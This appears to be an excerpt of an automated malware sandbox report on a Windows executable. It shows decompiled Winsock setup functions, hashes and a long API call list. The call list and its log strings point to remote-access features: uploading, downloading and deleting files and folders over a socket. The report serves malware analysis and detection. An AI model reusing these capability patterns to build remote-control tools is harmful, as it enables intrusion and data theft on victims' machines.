                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@A?$basic_string@V01@@$?data@?$basic_string@?empty@?$basic_string@D@1@@V01@Y?$basic_string@
                                                                                • String ID:
                                                                                • API String ID: 382206802-0
                                                                                • Opcode ID: d890864cfad681b016a33312849ab50d27a828bdf9536b28ad934c6231dadfcb
                                                                                • Instruction ID: d9a2345f5f1697b642a9e7ab7bc87c8d23e46c7080ea0e2ac139fbaf6b3ea179
                                                                                • Opcode Fuzzy Hash: d890864cfad681b016a33312849ab50d27a828bdf9536b28ad934c6231dadfcb
                                                                                • Instruction Fuzzy Hash: 97D0123650011CBBCB007FE9EC098D97B68DB452A5740C465FE1587261EA729620D7D5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00413E46, Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __dllonexit_onexit
                                                                                • String ID:
                                                                                • API String ID: 2384194067-0
                                                                                • Opcode ID: a0f76b705919cd2b1b3505feded0ad4b759bc61fe2e2080deee93d3e34803ae7
                                                                                • Instruction ID: 4ade6cbf426c929272142e716342c2a11d1dea90e179e11a85702f2ae3751f82
                                                                                • Opcode Fuzzy Hash: a0f76b705919cd2b1b3505feded0ad4b759bc61fe2e2080deee93d3e34803ae7
                                                                                • Instruction Fuzzy Hash: 55C01274CC4301FBCF102B60BC866C67711B7A1B32BA087AAF565110F0C77D49A4AA0D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402038, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 80%
                                                                                			E00402038(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr* _t9;

				_t9 = __ecx;
				if( *0x41b730 != 0) {
					L2:
					_push(6);
					_push(1);
					_push(0); // executed
					L0041418E(); // executed
					 *_t9 = _t6;
					if(_t6 != 0xffffffff) {
						 *(_t9 + 0x38) =  *(_t9 + 0x38) & 0x00000000;
						 *(_t9 + 0x39) =  *(_t9 + 0x39) & 0x00000000;
						 *((intOrPtr*)(_t9 + 0x34)) = 0x3e8;
						return _t6;
					} else {
						goto L3;
					}
				} else {
					_t6 = E00402074(); // executed
					if(_t6 == 0) {
						L3:
						return 0;
					} else {
						goto L2;
					}
				}
			}





                                                                                0x00402040
                                                                                0x00402042
                                                                                0x0040204d
                                                                                0x0040204d
                                                                                0x0040204f
                                                                                0x00402051
                                                                                0x00402053
                                                                                0x0040205b
                                                                                0x0040205d
                                                                                0x00402063
                                                                                0x00402067
                                                                                0x0040206b
                                                                                0x00402073
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402044
                                                                                0x00402044
                                                                                0x0040204b
                                                                                0x0040205f
                                                                                0x00402062
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040204b

                                                                                APIs
                                                                                • #23.WS2_32(00000000,00000001,00000006,0041BCB0,0040C8BF), ref: 00402053
                                                                                  • Part of subcall function 00402074: #115.WS2_32(00000202,?), ref: 00402089
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: #115
                                                                                • String ID:
                                                                                • API String ID: 646222842-0
                                                                                • Opcode ID: a838745da6ed8195359329033db1b7584455c5d17c7e212a85de7325608f8976
                                                                                • Instruction ID: 9496cea1f1e3f543e84bf9b8819d2566c755aa2e8cb9b0b358b440cdad1f8944
                                                                                • Opcode Fuzzy Hash: a838745da6ed8195359329033db1b7584455c5d17c7e212a85de7325608f8976
                                                                                • Instruction Fuzzy Hash: 0FE026204487A121EFB02B20678D3C32BC11B02738F0016AEF280769D3C3FC1485C388
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040209B, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 16%
                                                                                			E0040209B(intOrPtr* __ecx, void* _a4) {
				signed int _t3;

				_t1 = __ecx + 4; // 0x41be74
				_t3 = _t1;
				_push(0x10);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(_t3);
				_push( *__ecx);
				asm("movsd"); // executed
				L0041419A(); // executed
				asm("sbb al, al");
				return  ~_t3 + 1;
			}




                                                                                0x0040209f
                                                                                0x0040209f
                                                                                0x004020a8
                                                                                0x004020aa
                                                                                0x004020ab
                                                                                0x004020ac
                                                                                0x004020ad
                                                                                0x004020ae
                                                                                0x004020b0
                                                                                0x004020b1
                                                                                0x004020b8
                                                                                0x004020bf

                                                                                APIs
                                                                                • #4.WS2_32(0041BE70,0041BE74,00000010,?,0041B320,?,0040CA5C), ref: 004020B1
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8f987cbbf3fb9e12a8f92e976e4f78da9b9bf78db8d1cc63ee0fa56af0114424
                                                                                • Instruction ID: 87562d7c3fa6cfb31469a52a797acd734afc423ba1c102534055d0d979432199
                                                                                • Opcode Fuzzy Hash: 8f987cbbf3fb9e12a8f92e976e4f78da9b9bf78db8d1cc63ee0fa56af0114424
                                                                                • Instruction Fuzzy Hash: 15D0A73308052C7AC900DDA4EC02DF7375DDB83B60F104416FE018F052C293A59691D0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402074, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 53%
                                                                                			E00402074() {
				char _v404;
				signed int _t2;
				char _t4;

				_t2 =  &_v404;
				_push(_t2);
				_push(0x202); // executed
				L00414194(); // executed
				asm("sbb al, al");
				_t4 =  ~_t2 + 1;
				 *0x41b730 = _t4;
				return _t4;
			}






                                                                                0x0040207d
                                                                                0x00402083
                                                                                0x00402084
                                                                                0x00402089
                                                                                0x00402090
                                                                                0x00402092
                                                                                0x00402094
                                                                                0x0040209a

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: #115
                                                                                • String ID:
                                                                                • API String ID: 646222842-0
                                                                                • Opcode ID: 85389655ccf312e74c41d41a43fd4d1fbb1ccf973644e7ce17a1e4acb925192c
                                                                                • Instruction ID: aaec609cd6a5438bb82df53de8e824b0c91ee93dfa3372403453e0fac8186511
                                                                                • Opcode Fuzzy Hash: 85389655ccf312e74c41d41a43fd4d1fbb1ccf973644e7ce17a1e4acb925192c
                                                                                • Instruction Fuzzy Hash: 4AC08C3149431C6DEA02A3B5990BBE5776CD35EB44F4002BAAA11830D7D384955D42B6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 00403C4A, Relevance: 240.6, APIs: 121, Strings: 16, Instructions: 868fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403C60
                                                                                • SetEvent.KERNEL32(?), ref: 00403C69
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403C72
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6D195DF0), ref: 00403C8A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00403C9B
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403CAA
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403D11
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403D27
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00403D5F
                                                                                  • Part of subcall function 00403816: CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000,?,0041B310,00000000), ref: 00403845
                                                                                  • Part of subcall function 00403816: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040385C
                                                                                  • Part of subcall function 00403816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403B9B
                                                                                  • Part of subcall function 00403816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BA4
                                                                                  • Part of subcall function 00403816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BAD
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 00403D7A
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403DB1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00403DD6
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,00000000), ref: 00404199
                                                                                • atoi.MSVCRT ref: 004041A0
                                                                                  • Part of subcall function 00403473: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(Function_0001B300,00415664,[INFO],[DEBUG],00000000,?,004041B5,?,?,00000000), ref: 00403499
                                                                                  • Part of subcall function 00403473: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034AC
                                                                                  • Part of subcall function 00403473: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034B5
                                                                                  • Part of subcall function 00403473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034CE
                                                                                  • Part of subcall function 00403473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 004034DB
                                                                                  • Part of subcall function 00403473: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004034F0
                                                                                  • Part of subcall function 00403473: recv.WS2_32(00000000,?,0000FDE8,00000000), ref: 00403517
                                                                                  • Part of subcall function 00403473: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,00000000,?,0000FDE8,00000000), ref: 00403534
                                                                                  • Part of subcall function 00403473: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 00403541
                                                                                  • Part of subcall function 00403473: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403556
                                                                                  • Part of subcall function 00403473: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00403560
                                                                                  • Part of subcall function 00403473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403578
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004041C3
                                                                                  • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                                                                  • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloaded file size: ,00000000,?,?,?,00000000), ref: 004041E1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,Downloaded file size: ,00000000,?,?,?,00000000), ref: 004041EE
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404202
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 00404223
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040422D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404237
                                                                                  • Part of subcall function 00412D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040424C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040427E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Downloaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040428B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040429F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 004042AB
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004042C2
                                                                                  • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                                                                  • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                                                                  • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                                                                  • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                                                                  • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                                                                  • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                                                                  • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                                                                  • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                                                                  • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                                                                  • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                                                                  • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Failed to download file: ,00000000,?,00000000,?,00000000,00000000), ref: 00404300
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Failed to download file: ,00000000,?,00000000,?,00000000,00000000), ref: 00404311
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00404325
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00404331
                                                                                • closesocket.WS2_32(?), ref: 0040433A
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,00000000,00000001,00000000,00000000), ref: 004043F7
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 00404401
                                                                                • CreateDirectoryW.KERNEL32(00000000,?,?,00000001,00000000,00000000), ref: 00404408
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 00404414
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 00404420
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@G@Z.MSVCP60(0000002A,?,?,00000001,00000000,00000000), ref: 0040442B
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 0040443A
                                                                                • ?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,6D195DF8,00000001,00000000), ref: 00404489
                                                                                • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000001), ref: 00404499
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,?), ref: 004044AE
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004044B8
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004044C2
                                                                                • _wrename.MSVCRT ref: 004044C9
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004044E0
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?), ref: 00404587
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00404591
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040459D
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004045A6
                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 004045AD
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004045BA
                                                                                  • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C0A
                                                                                  • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C1E
                                                                                  • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C2A
                                                                                  • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C38
                                                                                  • Part of subcall function 00412BEE: FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                                                                  • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C6B
                                                                                  • Part of subcall function 00412BEE: FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                                                                  • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412CB4
                                                                                  • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                                                                  • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412CE9
                                                                                  • Part of subcall function 00412BEE: FindClose.KERNEL32(004085F5), ref: 00412D39
                                                                                  • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                                                                  • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                                                                  • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                                                                  • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004045C9
                                                                                • DeleteFileW.KERNEL32(00000000), ref: 004045D0
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Deleted file: ,00000000,?,?,?,?), ref: 004045FA
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Deleted file: ,00000000,?,?,?,?), ref: 0040460B
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Unable to delete: ,00000000,?,?,?,?,00000055), ref: 00404659
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Unable to delete: ,00000000,?,?,?,?,00000055), ref: 0040466A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0040467E
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000001,00415908,?,?,?,?,?,?,?,00000055), ref: 00404694
                                                                                • ?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,6D195DF8,?,?,?,?,?,00000055), ref: 004046AC
